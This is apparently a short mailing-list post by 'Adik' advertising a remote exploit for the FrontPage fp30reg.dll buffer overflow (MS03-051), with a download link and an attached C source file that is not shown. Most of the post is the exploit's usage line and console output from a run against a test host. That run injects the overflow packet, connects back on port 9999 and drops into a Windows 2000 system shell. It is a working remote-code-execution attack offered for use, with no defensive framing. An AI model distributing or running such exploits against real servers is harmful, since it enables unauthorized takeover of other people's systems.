Hello folks, If anyone is interested in an exploit for recently announced FPSE fp30reg.dll overflow bug (MS03-051) by Brett Moore, u can pick it up at http://netninja.to.kg ---- fp30reg.dll overflow ------- C:\fp30reg -={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver 0.2 }=- by Adik < netmaniac [at] hotmail.KG > http://netninja.to.kg Usage: fp30reg [Target] <port> eg: fp30reg.exe 192.168.63.130 C:\>fp30reg 192.168.63.130 -={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver 0.2 }=- by Adik < netmaniac [at] hotmail.KG > http://netninja.to.kg [*] Target: 192.168.63.130 Port: 80 [*] Socket initialized... [*] Checking for presence of fp30reg.dll... Found! [*] Packet injected! [*] Sleeping . . . . . . . . . . . . . [*] Connecting to host: 192.168.63.130 on port 9999 [*] Dropping to shell... Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> ------------ CHeerz, Adik
Attachment:
fp30reg.c
Description: Binary data
Scanned by evaluation version of Dr.Web antivirus Daemon http://drweb.ru/unix/